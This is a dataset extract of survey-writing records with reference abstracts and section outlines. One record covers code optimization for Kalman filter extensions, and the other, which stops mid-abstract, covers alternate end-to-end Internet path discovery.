survey_title
stringlengths
19
197
section_num
int64
3
56
references
stringlengths
4
1.34M
section_outline
stringlengths
531
9.08k
A Survey of Code Optimization Methods for Kalman Filter Extensions
12
--- paper_title: Recursive bayesian estimation using gaussian sums paper_content: The Bayesian recursion relations which describe the behavior of the a posteriori probability density function of the state of a time-discrete stochastic system conditioned on available measurement data cannot generally be solved in closed-form when the system is either non-linear or nongaussian. In this paper a density approximation involving convex combinations of gaussian density functions is introduced and proposed as a meaningful way of circumventing the difficulties encountered in evaluating these relations and in using the resulting densities to determine specific estimation policies. It is seen that as the number of terms in the gaussian sum increases without bound, the approximation converges uniformly to any density function in a large class. Further, any finite sum is itself a valid density function unlike many other approximations that have been investigated. The problem of determining the a posteriori density and minimum variance estimates for linear systems with nongaussian noise is treated using the gaussian sum approximation. This problem is considered because it can be dealt with in a relatively straightforward manner using the approximation but still contains most of the difficulties that one encounters in considering non-linear systems since the a posteriori density is nongaussian. After discussing the general problem from the point-of-view of applying gaussian sums, a numerical example is presented in which the actual statistics of the a posteriori density are compared with the values predicted by the gaussian sum and by the Kalman filter approximations. --- paper_title: UWB Positioning with Generalized Gaussian Mixture Filters paper_content: Low-complexity Bayesian filtering for nonlinear models is challenging. Approximative methods based on Gaussian mixtures (GM) and particle filters are able to capture multimodality, but suffer from high computational demand. In this paper, we provide an in-depth analysis of a generalized GM (GGM), which allows component weights to be negative, and requires significantly fewer components than the traditional GM for ranging models. Based on simulations and tests with real data from a network of UWB nodes, we show how the algorithm's accuracy depends on the uncertainty of the measurements. For nonlinear ranging the GGM filter outperforms the extended Kalman filter (EKF) in both positioning accuracy and consistency in environments with uncertain measurements, and requires only slightly higher computational effort when the number of measurement channels is small. In networks with highly reliable measurements, the GGM filter yields similar accuracy and better consistency than the EKF. --- paper_title: Modeling Infectious Diseases in Humans and Animals paper_content: By Matthew James Keelingand Pejman RohaniPrinceton, NJ: Princeton University Press,2008.408 pp., Illustrated. $65.00 (hardcover).Mathematical modeling of infectious dis-eases has progressed dramatically over thepast 3 decades and continues to flourishat the nexus of mathematics, epidemiol-ogy, and infectious diseases research. Nowrecognized as a valuable tool, mathemat-ical models are being integrated into thepublic health decision-making processmore than ever before. However, despiterapid advancements in this area, a formaltraining program for mathematical mod-eling is lacking, and there are very fewbooks suitable for a broad readership. Tosupport this bridging science, a commonlanguage that is understood in all con-tributing disciplines is required. --- paper_title: A Bayesian approach to problems in stochastic estimation and control paper_content: In this paper, a general class of stochastic estimation and control problems is formulated from the Bayesian Decision-Theoretic viewpoint. A discussion as to how these problems can be solved step by step in principle and practice from this approach is presented. As a specific example, the closed form Wiener-Kalman solution for linear estimation in Gaussian noise is derived. The purpose of the paper is to show that the Bayesian approach provides; 1) a general unifying framework within which to pursue further researches in stochastic estimation and control problems, and 2) the necessary computations and difficulties that must be overcome for these problems. An example of a nonlinear, non-Gaussian estimation problem is also solved. --- paper_title: Estimation with Applications to Tracking and Navigation paper_content: From the Publisher: ::: "Estimation with Applications to Tracking and Navigation treats the estimation of various quantities from inherently inaccurate remote observations. It explains state estimator design using a balanced combination of linear systems, probability, and statistics." "The authors provide a review of the necessary background mathematical techniques and offer an overview of the basic concepts in estimation. They then provide detailed treatments of all the major issues in estimation with a focus on applying these techniques to real systems." "Suitable for graduate engineering students and engineers working in remote sensors and tracking, Estimation with Applications to Tracking and Navigation provides expert coverage of this important area."--BOOK JACKET. --- paper_title: State space regularization in the nonstationary inverse problem for diffuse optical tomography paper_content: In this paper, we present a regularization method in the nonstationary inverse problem for diffuse optical tomography (DOT). The regularization is based on a choosing time evolution process such that in a stationary state it has a covariance function which corresponds to a process with similar smoothness properties as the first-order smoothness Tikhonov regularization. The proposed method is computationally more lightweight than the method where the regularization is augmented as a measurement. The method was tested in the case of the inverse problem of DOT. A solid phantom with optical properties similar to tissue was made, incorporating two moving parts that simulate two different physiological processes: a localized change in absorption and a surrounding rotating two-part shell which simulates slow oscillations in the tissue background physiology. A sequence of measurements of the phantom was made and the reconstruction of the image sequence was computed using this method. It allows the recovery of the full time series of images from relatively slow measurements with one source active at a time. In practice, this allows instruments with a larger dynamic range to be applied to the imaging of functional phenomena using DOT. --- paper_title: Gaussian filters for nonlinear filtering problems paper_content: We develop and analyze real-time and accurate filters for nonlinear filtering problems based on the Gaussian distributions. We present the systematic formulation of Gaussian filters and develop efficient and accurate numerical integration of the optimal filter. We also discuss the mixed Gaussian filters in which the conditional probability density is approximated by the sum of Gaussian distributions. A new update rule of weights for Gaussian sum filters is proposed. Our numerical tests demonstrate that new filters significantly improve the extended Kalman filter with no additional cost, and the new Gaussian sum filter has a nearly optimal performance. --- paper_title: Rao-Blackwellised Particle Filtering for Dynamic Bayesian Networks paper_content: Particle filters (PFs) are powerful sampling-based inference/learning algorithms for dynamic Bayesian networks (DBNs). They allow us to treat, in a principled way, any type of probability distribution, nonlinearity and non-stationarity. They have appeared in several fields under such names as "condensation", "sequential Monte Carlo" and "survival of the fittest". In this paper, we show how we can exploit the structure of the DBN to increase the efficiency of particle filtering, using a technique known as Rao-Blackwellisation. Essentially, this samples some of the variables, and marginalizes out the rest exactly, using the Kalman filter, HMM filter, junction tree algorithm, or any other finite dimensional optimal filter. We show that Rao-Blackwellised particle filters (RBPFs) lead to more accurate estimates than standard PFs. We demonstrate RBPFs on two problems, namely non-stationary online regression with radial basis function networks and robot localization and map building. We also discuss other potential application areas and provide references to some finite dimensional optimal filters. --- paper_title: Cubature Kalman Filters paper_content: In this paper, we present a new nonlinear filter for high-dimensional state estimation, which we have named the cubature Kalman filter (CKF). The heart of the CKF is a spherical-radial cubature rule, which makes it possible to numerically compute multivariate moment integrals encountered in the nonlinear Bayesian filter. Specifically, we derive a third-degree spherical-radial cubature rule that provides a set of cubature points scaling linearly with the state-vector dimension. The CKF may therefore provide a systematic solution for high-dimensional nonlinear filtering problems. The paper also includes the derivation of a square-root version of the CKF for improved numerical stability. The CKF is tested experimentally in two nonlinear state estimation problems. In the first problem, the proposed cubature rule is used to compute the second-order statistics of a nonlinearly transformed Gaussian random variable. The second problem addresses the use of the CKF for tracking a maneuvering aircraft. The results of both experiments demonstrate the improved performance of the CKF over conventional nonlinear filters. --- paper_title: New developments in state estimation for nonlinear systems paper_content: Based on an interpolation formula, accurate state estimators for nonlinear systems can be derived. The estimators do not require derivative information which makes them simple to implement. --- paper_title: State space regularization in the nonstationary inverse problem for diffuse optical tomography paper_content: In this paper, we present a regularization method in the nonstationary inverse problem for diffuse optical tomography (DOT). The regularization is based on a choosing time evolution process such that in a stationary state it has a covariance function which corresponds to a process with similar smoothness properties as the first-order smoothness Tikhonov regularization. The proposed method is computationally more lightweight than the method where the regularization is augmented as a measurement. The method was tested in the case of the inverse problem of DOT. A solid phantom with optical properties similar to tissue was made, incorporating two moving parts that simulate two different physiological processes: a localized change in absorption and a surrounding rotating two-part shell which simulates slow oscillations in the tissue background physiology. A sequence of measurements of the phantom was made and the reconstruction of the image sequence was computed using this method. It allows the recovery of the full time series of images from relatively slow measurements with one source active at a time. In practice, this allows instruments with a larger dynamic range to be applied to the imaging of functional phenomena using DOT. --- paper_title: The unscented Kalman filter for nonlinear estimation paper_content: This paper points out the flaws in using the extended Kalman filter (EKE) and introduces an improvement, the unscented Kalman filter (UKF), proposed by Julier and Uhlman (1997). A central and vital operation performed in the Kalman filter is the propagation of a Gaussian random variable (GRV) through the system dynamics. In the EKF the state distribution is approximated by a GRV, which is then propagated analytically through the first-order linearization of the nonlinear system. This can introduce large errors in the true posterior mean and covariance of the transformed GRV, which may lead to sub-optimal performance and sometimes divergence of the filter. The UKF addresses this problem by using a deterministic sampling approach. The state distribution is again approximated by a GRV, but is now represented using a minimal set of carefully chosen sample points. These sample points completely capture the true mean and covariance of the GRV, and when propagated through the true nonlinear system, captures the posterior mean and covariance accurately to the 3rd order (Taylor series expansion) for any nonlinearity. The EKF in contrast, only achieves first-order accuracy. Remarkably, the computational complexity of the UKF is the same order as that of the EKF. Julier and Uhlman demonstrated the substantial performance gains of the UKF in the context of state-estimation for nonlinear control. Machine learning problems were not considered. We extend the use of the UKF to a broader class of nonlinear estimation problems, including nonlinear system identification, training of neural networks, and dual estimation problems. In this paper, the algorithms are further developed and illustrated with a number of additional examples. --- paper_title: Gaussian Filter based on Deterministic Sampling for High Quality Nonlinear Estimation paper_content: In this paper, a Gaussian filter for nonlinear Bayesian estimation is introduced that is based on a deterministic sample selection scheme. For an effective sample selection, a parametric density function representation of the sample points is employed, which allows approximating the cumulative distribution function of the prior Gaussian density. The computationally demanding parts of the optimization problem formulated for approximation are carried out off-line for obtaining an efficient filter, whose estimation quality can be altered by adjusting the number of used sample points. The improved performance of the proposed Gaussian filter compared to the well-known unscented Kalman filter is demonstrated by means of two examples. --- paper_title: Gaussian filters for nonlinear filtering problems paper_content: We develop and analyze real-time and accurate filters for nonlinear filtering problems based on the Gaussian distributions. We present the systematic formulation of Gaussian filters and develop efficient and accurate numerical integration of the optimal filter. We also discuss the mixed Gaussian filters in which the conditional probability density is approximated by the sum of Gaussian distributions. A new update rule of weights for Gaussian sum filters is proposed. Our numerical tests demonstrate that new filters significantly improve the extended Kalman filter with no additional cost, and the new Gaussian sum filter has a nearly optimal performance. --- paper_title: Stochastic Processes and Filtering Theory paper_content: This book presents a unified treatment of linear and nonlinear filtering theory for engineers, with sufficient emphasis on applications to enable the reader to use the theory. The need for this book is twofold. First, although linear estimation theory is relatively well known, it is largely scattered in the journal literature and has not been collected in a single source. Second, available literature on the continuous nonlinear theory is quite esoteric and controversial, and thus inaccessible to engineers uninitiated in measure theory and stochastic differential equations. Furthermore, it is not clear from the available literature whether the nonlinear theory can be applied to practical engineering problems. In attempting to fill the stated needs, the author has retained as much mathematical rigor as he felt was consistent with the prime objective" to explain the theory to engineers. Thus, the author has avoided measure theory in this book by using mean square convergence, on the premise that everyone knows how to average. As a result, the author only requires of the reader background in advanced calculus, theory of ordinary differential equations, and matrix analysis. --- paper_title: Optimization of the Simultaneous Localization and Map Building Algorithm for Real Time Implementation paper_content: Addresses real-time implementation of the simultaneous localization and map-building (SLAM) algorithm. It presents optimal algorithms that consider the special form of the matrices and a new compressed filler that can significantly reduce the computation requirements when working in local areas or with high frequency external sensors. It is shown that by extending the standard Kalman filter models the information gained in a local area can be maintained with a cost /spl sim/O(N/sub a//sup 2/), where N/sub a/ is the number of landmarks in the local area, and then transferred to the overall map in only one iteration at full SLAM computational cost. Additional simplifications are also presented that are very close to optimal when an appropriate map representation is used. Finally the algorithms are validated with experimental results obtained with a standard vehicle running in a completely unstructured outdoor environment. --- paper_title: Nonlinear Kalman Filtering for Force-Controlled Robot Tasks paper_content: Introduction.- Literature Survey: Autonomous Compliant Motion.- Literature Survey: Bayesian Probability Theory.- Kalman Filters for Nonlinear Systems.- The Non-Minimal State Kalman Filter.- Contact Modelling.- Geometrical Parameter Estimation and CF Recognition.- Experiment: A Cube-In-Corner Assembly.- Task Planning with Active Sensing.- General Conclusions. --- paper_title: Reduced Sigma Point Filtering for Partially Linear Models paper_content: A method for performing unscented Kalman filtering with a reduced number of sigma points is proposed. The procedure is applicable when either the process or measurement equations are partially linear in the sense that only a subset of the elements of the state vector undergo a nonlinear transformation. It is shown that for such models second-order accuracy in the moments required for the unscented Kalman filter recursion can be obtained using a number of sigma points determined by the number of nonlinearly transformed elements rather than the dimension of the state vector. A procedure for computing the sigma points is developed. An application of the proposed method to smoothed target state estimation from bearings measurements is presented. --- paper_title: State space regularization in the nonstationary inverse problem for diffuse optical tomography paper_content: In this paper, we present a regularization method in the nonstationary inverse problem for diffuse optical tomography (DOT). The regularization is based on a choosing time evolution process such that in a stationary state it has a covariance function which corresponds to a process with similar smoothness properties as the first-order smoothness Tikhonov regularization. The proposed method is computationally more lightweight than the method where the regularization is augmented as a measurement. The method was tested in the case of the inverse problem of DOT. A solid phantom with optical properties similar to tissue was made, incorporating two moving parts that simulate two different physiological processes: a localized change in absorption and a surrounding rotating two-part shell which simulates slow oscillations in the tissue background physiology. A sequence of measurements of the phantom was made and the reconstruction of the image sequence was computed using this method. It allows the recovery of the full time series of images from relatively slow measurements with one source active at a time. In practice, this allows instruments with a larger dynamic range to be applied to the imaging of functional phenomena using DOT. --- paper_title: A rao-blackwellised unscented Kalman filter paper_content: The Unscented Kalman Filter oflers sign$- cant improvements in the estimation of non-linear discrete- time models in comparison to the Extended Kalman Fil- ter 1121. In this paper we use a technique introduced by Casella and Robert (2), known as Rao-Blackwellisation, to calculate the tractable integrations that are found in the Unscented Kalman Filter: We show that this leads to a re- duction in the quasi-Monte Carlo variance, and a decrease in the computational complexity by considering a common tracking problem. --- paper_title: Gaussian Filtering using state decomposition methods paper_content: State estimation for nonlinear systems generally requires approximations of the system or the probability densities, as the occurring prediction and filtering equations cannot be solved in closed form. For instance, Linear Regression Kalman Filters like the Unscented Kalman Filter or the considered Gaussian Filter propagate a small set of sample points through the system to approximate the posterior mean and covariance matrix. To reduce the number of sample points, special structures of the system and measurement equation can be taken into account. In this paper, two principles of system decomposition are considered and applied to the Gaussian Filter. One principle exploits that only a part of the state vector is directly observed by the measurement. The second principle separates the system equations into linear and nonlinear parts in order to merely approximate the nonlinear part of the state. The benefits of both decompositions are demonstrated on a real-world example. --- paper_title: An Unscented Transformation for Conditionally Linear Models paper_content: A new method of applying the unscented transformation to conditionally linear transformations of Gaussian random variables is proposed. This method exploits the structure of the model to reduce the required number of sigma points. A common application of the unscented transformation is to nonlinear filtering where it used to approximate the moments required in the Kalman filter recursion. The proposed procedure is applied to a nonlinear filtering problem which involves tracking a falling object. --- paper_title: Optimization of the Simultaneous Localization and Map Building Algorithm for Real Time Implementation paper_content: Addresses real-time implementation of the simultaneous localization and map-building (SLAM) algorithm. It presents optimal algorithms that consider the special form of the matrices and a new compressed filler that can significantly reduce the computation requirements when working in local areas or with high frequency external sensors. It is shown that by extending the standard Kalman filter models the information gained in a local area can be maintained with a cost /spl sim/O(N/sub a//sup 2/), where N/sub a/ is the number of landmarks in the local area, and then transferred to the overall map in only one iteration at full SLAM computational cost. Additional simplifications are also presented that are very close to optimal when an appropriate map representation is used. Finally the algorithms are validated with experimental results obtained with a standard vehicle running in a completely unstructured outdoor environment. --- paper_title: Nonlinear Kalman Filtering for Force-Controlled Robot Tasks paper_content: Introduction.- Literature Survey: Autonomous Compliant Motion.- Literature Survey: Bayesian Probability Theory.- Kalman Filters for Nonlinear Systems.- The Non-Minimal State Kalman Filter.- Contact Modelling.- Geometrical Parameter Estimation and CF Recognition.- Experiment: A Cube-In-Corner Assembly.- Task Planning with Active Sensing.- General Conclusions. --- paper_title: Kullback-Leibler Divergence Approach to Partitioned Update Kalman Filter paper_content: Kalman filtering is a widely used framework for Bayesian estimation. The partitioned update Kalman filter applies a Kalman filter update in parts so that the most linear parts of measurements are applied first. In this paper, we generalize partitioned update Kalman filter, which requires the use of the second order extended Kalman filter, so that it can be used with any Kalman filter extension such as the unscented Kalman filter. To do so, we use a Kullback-Leibler divergence approach to measure the nonlinearity of the measurement, which is theoretically more sound than the nonlinearity measure used in the original partitioned update Kalman filter. Results show that the use of the proposed partitioned update filter improves the estimation accuracy. --- paper_title: Particle filter and smoother for indoor localization paper_content: We present a real-time particle filter for 2D and 3D hybrid indoor positioning. It uses wireless local area network (WLAN) based position measurements, step and turn detection from a hand-held inertial sensor unit, floor plan restrictions, altitude change measurements from barometer and possibly other measurements such as occasional GNSS fixes. We also present a particle smoother, which uses future measurements to improve the position estimate for non-real-time applications. A light-weight fallback filter is run in the background for initialization, divergence monitoring and possibly re-initialization. In real-data tests the particle filter is more accurate and consistent than the methods that do not use floor plans. An example is shown on how smoothing helps to improve the filter estimate. Moreover, a floor change case is presented, in which the filter is capable of detecting the floor change and improving the 2D accuracy using the floor change information. --- paper_title: A TDOA Gaussian mixture model for improving acoustic source tracking paper_content: Traditionally, time difference of arrival (TDOA) based acoustic source tracking consists of two stages, more precisely, estimation of TDOAs followed by a tracking algorithm. In general, these two stages are performed separately and presume that (1) TDOAs can be estimated reliably; and (2) the errors in detection behave in a well-defined fashion. The presence of noise and reverberation, however, leads to multimodal TDOA distributions and causes larger errors in the estimates, which ultimately lowers the tracking performance. To counteract this effect, we propose an approach that enhances TDOA estimation by (1) accounting for the multimodal aspect through a Gaussian mixture model and (2) integrating knowledge that has been obtained in the tracking stage. In doing so, this approach tightly couples the two stages. Experimental results on the AV16.3 corpus show that the proposed approach significantly improves the tracking performance compared to various other tracking algorithms. --- paper_title: The huge microphone array paper_content: The Huge Microphone Array project began in February 1994 to design, construct, debug, and test a real-time 512-microphone array system and to develop algorithms for it. Analysis of known algorithms indicated that signal-processing performance of over 6 Gflops would be required, while the need for portability-fitting it into a small van-also set an upper limit to the power required. These trade-offs and many others have led to a unique design in both hardware and software. This two-part article presents the full design and its justifications. The authors also discuss performance for a few important algorithms relative to the use of processing capability, response latency, and difficulty of programming. --- paper_title: System for robust 3D speaker tracking using microphone array measurements paper_content: A system for three-dimensional passive acoustic speaker localization and tracking using a microphone array is presented and evaluated. Initial speaker position estimates are provided by a time-delay-based localization algorithm. These raw estimates are spatially smoothed by a multiple model adaptive estimator consisting of three extended Kalman filters running in parallel. The performance of the proposed system is evaluated for real data in a common office environment. The reference trajectory of the moving speaker is delivered by visually tracking a color marker on the speaker's forehead by a stereo-camera system. The proposed acoustic source tracker shows robustness and accuracy in a variety of different scenarios. --- paper_title: Design of Sigma-Point Kalman Filter with Recursive Updated Measurement paper_content: In this study, the authors focus on improving measurement update of existing nonlinear Kalman approximation filter and propose a new sigma-point Kalman filter with recursive measurement update. Statistical linearization technique based on sigma transformation is utilized in the proposed filter to linearize the nonlinear measurement function, and linear measurement update is applied gradually and repeatedly based on the statistically linearized measurement equation. The total measurement update of the proposed filter is nonlinear, and the proposed filter can extract state information from nonlinear measurement better than existing nonlinear filters. Simulation results show that the proposed method has higher estimation accuracy than existing methods. --- paper_title: Recursive Update Filtering for Nonlinear Estimation paper_content: Nonlinear filters are often very computationally expensive and usually not suitable for real-time applications. Real-time navigation algorithms are typically based on linear estimators, such as the extended Kalman filter (EKF) and, to a much lesser extent, the unscented Kalman filter. This work proposes a novel nonlinear estimator whose additional computational cost is comparable to (N-1) EKF updates, where N is the number of recursions, a tuning parameter. The higher N the less the filter relies on the linearization assumption. A second algorithm is proposed with a differential update, which is equivalent to the recursive update as N tends to infinity. --- paper_title: Design of Sigma-Point Kalman Filter with Recursive Updated Measurement paper_content: In this study, the authors focus on improving measurement update of existing nonlinear Kalman approximation filter and propose a new sigma-point Kalman filter with recursive measurement update. Statistical linearization technique based on sigma transformation is utilized in the proposed filter to linearize the nonlinear measurement function, and linear measurement update is applied gradually and repeatedly based on the statistically linearized measurement equation. The total measurement update of the proposed filter is nonlinear, and the proposed filter can extract state information from nonlinear measurement better than existing nonlinear filters. Simulation results show that the proposed method has higher estimation accuracy than existing methods. --- paper_title: Recursive Update Filtering for Nonlinear Estimation paper_content: Nonlinear filters are often very computationally expensive and usually not suitable for real-time applications. Real-time navigation algorithms are typically based on linear estimators, such as the extended Kalman filter (EKF) and, to a much lesser extent, the unscented Kalman filter. This work proposes a novel nonlinear estimator whose additional computational cost is comparable to (N-1) EKF updates, where N is the number of recursions, a tuning parameter. The higher N the less the filter relies on the linearization assumption. A second algorithm is proposed with a differential update, which is equivalent to the recursive update as N tends to infinity. --- paper_title: Cubature Kalman Filters paper_content: In this paper, we present a new nonlinear filter for high-dimensional state estimation, which we have named the cubature Kalman filter (CKF). The heart of the CKF is a spherical-radial cubature rule, which makes it possible to numerically compute multivariate moment integrals encountered in the nonlinear Bayesian filter. Specifically, we derive a third-degree spherical-radial cubature rule that provides a set of cubature points scaling linearly with the state-vector dimension. The CKF may therefore provide a systematic solution for high-dimensional nonlinear filtering problems. The paper also includes the derivation of a square-root version of the CKF for improved numerical stability. The CKF is tested experimentally in two nonlinear state estimation problems. In the first problem, the proposed cubature rule is used to compute the second-order statistics of a nonlinearly transformed Gaussian random variable. The second problem addresses the use of the CKF for tracking a maneuvering aircraft. The results of both experiments demonstrate the improved performance of the CKF over conventional nonlinear filters. --- paper_title: Nonlinear Kalman Filtering for Force-Controlled Robot Tasks paper_content: Introduction.- Literature Survey: Autonomous Compliant Motion.- Literature Survey: Bayesian Probability Theory.- Kalman Filters for Nonlinear Systems.- The Non-Minimal State Kalman Filter.- Contact Modelling.- Geometrical Parameter Estimation and CF Recognition.- Experiment: A Cube-In-Corner Assembly.- Task Planning with Active Sensing.- General Conclusions. --- paper_title: New developments in state estimation for nonlinear systems paper_content: Based on an interpolation formula, accurate state estimators for nonlinear systems can be derived. The estimators do not require derivative information which makes them simple to implement. --- paper_title: The unscented Kalman filter for nonlinear estimation paper_content: This paper points out the flaws in using the extended Kalman filter (EKE) and introduces an improvement, the unscented Kalman filter (UKF), proposed by Julier and Uhlman (1997). A central and vital operation performed in the Kalman filter is the propagation of a Gaussian random variable (GRV) through the system dynamics. In the EKF the state distribution is approximated by a GRV, which is then propagated analytically through the first-order linearization of the nonlinear system. This can introduce large errors in the true posterior mean and covariance of the transformed GRV, which may lead to sub-optimal performance and sometimes divergence of the filter. The UKF addresses this problem by using a deterministic sampling approach. The state distribution is again approximated by a GRV, but is now represented using a minimal set of carefully chosen sample points. These sample points completely capture the true mean and covariance of the GRV, and when propagated through the true nonlinear system, captures the posterior mean and covariance accurately to the 3rd order (Taylor series expansion) for any nonlinearity. The EKF in contrast, only achieves first-order accuracy. Remarkably, the computational complexity of the UKF is the same order as that of the EKF. Julier and Uhlman demonstrated the substantial performance gains of the UKF in the context of state-estimation for nonlinear control. Machine learning problems were not considered. We extend the use of the UKF to a broader class of nonlinear estimation problems, including nonlinear system identification, training of neural networks, and dual estimation problems. In this paper, the algorithms are further developed and illustrated with a number of additional examples. --- paper_title: Gaussian Filter based on Deterministic Sampling for High Quality Nonlinear Estimation paper_content: In this paper, a Gaussian filter for nonlinear Bayesian estimation is introduced that is based on a deterministic sample selection scheme. For an effective sample selection, a parametric density function representation of the sample points is employed, which allows approximating the cumulative distribution function of the prior Gaussian density. The computationally demanding parts of the optimization problem formulated for approximation are carried out off-line for obtaining an efficient filter, whose estimation quality can be altered by adjusting the number of used sample points. The improved performance of the proposed Gaussian filter compared to the well-known unscented Kalman filter is demonstrated by means of two examples. --- paper_title: Gaussian filters for nonlinear filtering problems paper_content: We develop and analyze real-time and accurate filters for nonlinear filtering problems based on the Gaussian distributions. We present the systematic formulation of Gaussian filters and develop efficient and accurate numerical integration of the optimal filter. We also discuss the mixed Gaussian filters in which the conditional probability density is approximated by the sum of Gaussian distributions. A new update rule of weights for Gaussian sum filters is proposed. Our numerical tests demonstrate that new filters significantly improve the extended Kalman filter with no additional cost, and the new Gaussian sum filter has a nearly optimal performance. --- paper_title: Stochastic Processes and Filtering Theory paper_content: This book presents a unified treatment of linear and nonlinear filtering theory for engineers, with sufficient emphasis on applications to enable the reader to use the theory. The need for this book is twofold. First, although linear estimation theory is relatively well known, it is largely scattered in the journal literature and has not been collected in a single source. Second, available literature on the continuous nonlinear theory is quite esoteric and controversial, and thus inaccessible to engineers uninitiated in measure theory and stochastic differential equations. Furthermore, it is not clear from the available literature whether the nonlinear theory can be applied to practical engineering problems. In attempting to fill the stated needs, the author has retained as much mathematical rigor as he felt was consistent with the prime objective" to explain the theory to engineers. Thus, the author has avoided measure theory in this book by using mean square convergence, on the premise that everyone knows how to average. As a result, the author only requires of the reader background in advanced calculus, theory of ordinary differential equations, and matrix analysis. ---
Title: A Survey of Code Optimization Methods for Kalman Filter Extensions Section 1: Introduction Description 1: Introduce the application areas of Bayesian state estimation and Kalman Filter Extensions (KFEs), and outline the workflow of the paper. Section 2: Notations Description 2: List and describe the variables and notations used throughout the paper. Section 3: Background Description 3: Provide the background of discrete-time Bayesian filtering and various Kalman Filter Extensions. Section 4: Partially Linear Functions Description 4: Discuss algorithms for treating different setups of UKF and improving computation efficiency with partially linear state and measurement models. Section 5: Conditionally Linear Measurements Description 5: Present algorithms for handling conditionally linear state variables using sigma-points and other optimization techniques. Section 6: Part of State Is Unobserved and Static Description 6: Examine situations where some state variables are unobserved and static, and describe the corresponding optimization algorithms. Section 7: Part of State is Unobserved and Whole State Is Static Description 7: Explore optimization methods for cases where all state variables are static and partially unobserved. Section 8: Block Diagonal Measurement Covariance Description 8: Describe the optimization of the Kalman gain computation using block diagonal measurement covariance. Section 9: Applying the Matrix Inversion Lemma to Innovation Covariance Description 9: Explain the optimization of the inverse of the innovation covariance using the matrix inversion lemma. Section 10: Pedestrian Dead Reckoning Description 10: Provide a case study on applying the surveyed optimization techniques to pedestrian dead reckoning systems. Section 11: Optimization of Iterative KFEs Description 11: Discuss the application of the optimizations to iterative KFE algorithms like Recursive Update Filter (RUF). Section 12: Conclusions Description 12: Summarize the contributions of the survey, highlighting the unification and general notation of various optimization methods.
Finding Alternate Paths in the Internet:A Survey of Techniques for End-to-End Path Discovery
11
--- paper_title: Delayed Internet routing convergence paper_content: This paper examines the latency in Internet path failure, failover, and repair due to the convergence properties of interdomain routing. Unlike circuit-switched paths which exhibit failover on the order of milliseconds, our experimental measurements show that interdomain routers in the packet-switched Internet may take tens of minutes to reach a consistent view of the network topology after a fault. These delays stem from temporary routing table fluctuations formed during the operation of the border gateway protocol (BGP) path selection process on the Internet backbone routers. During these periods of delayed convergence, we show that end-to-end Internet paths will experience intermittent loss of connectivity, as well as increased packet loss and latency. We present a two-year study of Internet routing convergence through the experimental instrumentation of key portions of the Internet infrastructure, including both passive data collection and fault-injection machines at major Internet exchange points. Based on data from the injection and measurement of several hundred thousand interdomain routing faults, we describe several unexpected properties of convergence and show that the measured upper bound on Internet interdomain routing convergence delay is an order of magnitude slower than previously thought. Our analysis also shows that the upper theoretic computational bound on the number of router states and control messages exchanged during the process of BGP convergence is factorial with respect to the number of autonomous systems in the Internet. Finally, we demonstrate that much of the observed convergence delay stems from specific router vendor implementation decisions and ambiguity in the BGP specification. --- paper_title: Improving the Reliability of Internet Paths with One-hop Source Routing paper_content: Recent work has focused on increasing availability in the face of Internet path failures. To date, proposed solutions have relied on complex routing and path-monitoring schemes, trading scalability for availability among a relatively small set of hosts. ::: ::: This paper proposes a simple, scalable approach to recover from Internet path failures. Our contributions are threefold. First, we conduct a broad measurement study of Internet path failures on a collection of 3,153 Internet destinations consisting of popular Web servers, broad-band hosts, and randomly selected nodes. We monitored these destinations from 67 PlanetLab vantage points over a period of seven days, and found availabilities ranging from 99.6% for servers to 94.4% for broadband hosts. When failures do occur, many appear too close to the destination (e.g., last-hop and end-host failures) to be mitigated through alternative routing techniques of any kind. Second, we show that for the failures that can be addressed through routing, a simple, scalable technique, called one-hop source routing, can achieve close to the maximum benefit available with very low overhead. When a path failure occurs, our scheme attempts to recover from it by routing indirectly through a small set of randomly chosen intermediaries. ::: ::: Third, we implemented and deployed a prototype one-hop source routing infrastructure on PlanetLab. Over a three day period, we repeatedly fetched documents from 982 popular Internet Web servers and used one-hop source routing to attempt to route around the failures we observed. Our results show that our prototype successfully recovered from 56% of network failures. However, we also found a large number of server failures that cannot be addressed through alternative routing. ::: ::: Our research demonstrates that one-hop source routing is easy to implement, adds negligible overhead, and achieves close to the maximum benefit available to indirect routing schemes, without the need for path monitoring, history, or a-priori knowledge of any kind. --- paper_title: Bandwidth-Aware Routing in Overlay Networks paper_content: In the absence of end-to-end quality of service (QoS), overlay routing has been used as an alternative to the default best effort Internet routing. Using end-to-end network measurement, the problematic parts of the path can be bypassed, resulting in improving the resiliency and robustness to failures. Studies have shown that overlay paths can give better latency, loss rate, and TCP throughput. Overlay routing also offers flexibility as different routes can be used based on application needs. There have been very few proposals of using bandwidth as the main metric of interest, which is of great concern in media applications. We introduce our scheme BARON (Bandwidth-Aware Routing in Overlay Networks) that utilizes capacity between the end hosts to identify viable overlay paths and measures available bandwidth to select the best route. We propose our path selection approaches, and using the measurements between 174 PlanetLab nodes and over 13,189 paths, we evaluate the usefulness of overlay routes in terms of bandwidth gain. Our results show that among 658,526 overlay paths, 25% have larger bandwidth than their native IP routes, and over 86% of (source, destination) pairs have at least one overlay route with larger bandwidth than the default IP routes. We also present the effectiveness of BARON in preserving the bandwidth requirement over time for a few selected Internet paths. --- paper_title: Exploiting internet route sharing for large scale available bandwidth estimation paper_content: Recent progress in active measurement techniques has made it possible to estimate end-to-end path available bandwidth. However, how to efficiently obtain available bandwidth information for the N2 paths in a large N-node system remains an open problem. While researchers have developed coordinate-based models that allow any node to quickly and accurately estimate latency in a scalable fashion, no such models exist for available bandwidth. In this paper we introduce BRoute--a scalable available bandwidth estimation system that is based on a route sharing model. The characteristics of BRoute are that its overhead is linear with the number of end nodes in the system, and that it requires only limited cooperation among end nodes. BRoute leverages the fact that most Internet bottlenecks are on path edges, and that edges are shared by many different paths. It uses AS-level source and sink trees to characterize and infer path-edge sharing in a scalable fashion. In this paper, we describe the BRoute architecture and evaluate the performance of its components. Initial experiments show that BRoute can infer path edges with an accuracy of over 80%. In a small case study on Planetlab, 80% of the available bandwidth estimates obtained from BRoute are accurate within 50%. --- paper_title: Dynamic Overlay Routing Based on Available Bandwidth Estimation: A Simulation Study paper_content: Dynamic overlay routing has been proposed as a way to enhance the reliability and performance of IP networks. The major premise is that overlay routing can bypass congestion, transient outages, or suboptimal paths, by forwarding traffic through one or more intermediate overlay nodes. In this paper, we perform an extensive simulation study to investigate the performance of dynamic overlay routing. In particular, we leverage recent work on available bandwidth (avail-bw) estimation, and focus on overlay routing that selects paths based on avail-bw measurements between adjacent overlay nodes. First, we compare two overlay routing algorithms, reactive and proactive, with shortest-path native routing. We show that reactive routing has significant benefits in terms of throughput and path stability, while proactive routing is better in providing flows with a larger safety margin (''headroom''), and propose a hybrid routing scheme that combines the best features of the previous two 